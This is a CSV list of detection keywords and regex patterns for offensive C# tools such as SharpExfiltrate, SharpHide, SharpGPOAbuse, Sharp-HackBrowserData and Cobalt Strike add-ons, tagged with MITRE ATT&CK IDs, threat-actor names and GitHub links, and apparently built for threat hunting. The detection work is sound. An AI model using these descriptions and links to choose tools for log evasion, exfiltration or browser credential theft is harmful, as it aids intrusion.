"*SharpEvtMute.sln*",".{0,1000}SharpEvtMute\.sln.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpExcelibur*",".{0,1000}SharpExcelibur.{0,1000}","offensive_tool_keyword","cobaltstrike","Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpExcelibur","1","1","N/A","10","10","87","19","2021-07-20T04:56:55Z","2021-07-16T19:48:45Z" "*sharp-exec *",".{0,1000}sharp\-exec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. 
This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpExec.exe*",".{0,1000}SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpExfiltrate.csproj*",".{0,1000}SharpExfiltrate\.csproj.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate.exe*",".{0,1000}SharpExfiltrate\.exe.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate.sln*",".{0,1000}SharpExfiltrate\.sln.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrateLootCache*",".{0,1000}SharpExfiltrateLootCache.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted 
channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate-main*",".{0,1000}SharpExfiltrate\-main.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*sharp-fexec *",".{0,1000}sharp\-fexec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpFtpC2*",".{0,1000}SharpFtpC2.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*SharpGen.dll*",".{0,1000}SharpGen\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*sharpgen.enable_cache*",".{0,1000}sharpgen\.enable_cache.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*sharpgen.py*",".{0,1000}sharpgen\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*sharpgen.set_location*",".{0,1000}sharpgen\.set_location.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*SharpGhost.exe*",".{0,1000}SharpGhost\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - 
TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*SharpGhosting.exe*",".{0,1000}SharpGhosting\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*SharpGhostTask.csproj*",".{0,1000}SharpGhostTask\.csproj.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*SharpGhostTask.exe*",".{0,1000}SharpGhostTask\.exe.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*SharpGhostTask.sln*",".{0,1000}SharpGhostTask\.sln.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*SharpGmailC2-main*",".{0,1000}SharpGmailC2\-main.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*SharpGPOAbuse*",".{0,1000}SharpGPOAbuse.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1204 - T1484 - T1556 - T1574 - T1562","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "*SharpGPOAbuse*",".{0,1000}SharpGPOAbuse.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "*SharpGPOAbuse.exe*",".{0,1000}SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpGPOAddComputer*",".{0,1000}SharpGPOAddComputer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpGPOAddLocalAdmin*",".{0,1000}SharpGPOAddLocalAdmin.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpGPOAddUser*Manager*",".{0,1000}SharpGPOAddUser.{0,1000}Manager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
"*Sharp-HackBrowserData*",".{0,1000}Sharp\-HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embedded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","94","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*Sharp-HackBrowserData*",".{0,1000}Sharp\-HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*SharpHandler.exe*",".{0,1000}SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpHide running as elevated user*",".{0,1000}SharpHide\srunning\sas\selevated\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.csproj*",".{0,1000}SharpHide\.csproj.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.exe*",".{0,1000}SharpHide\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.sln*",".{0,1000}SharpHide\.sln.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" 
"*SharpHide-master*",".{0,1000}SharpHide\-master.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide-N*.exe*",".{0,1000}SharpHide\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*SharpHose.exe*",".{0,1000}SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharphound -*",".{0,1000}sharphound\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpHound-*.zip*",".{0,1000}SharpHound\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*sharphound*--stealth*",".{0,1000}sharphound.{0,1000}\-\-stealth.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*sharphound.*",".{0,1000}sharphound\..{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SharpHound.cna*",".{0,1000}SharpHound\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 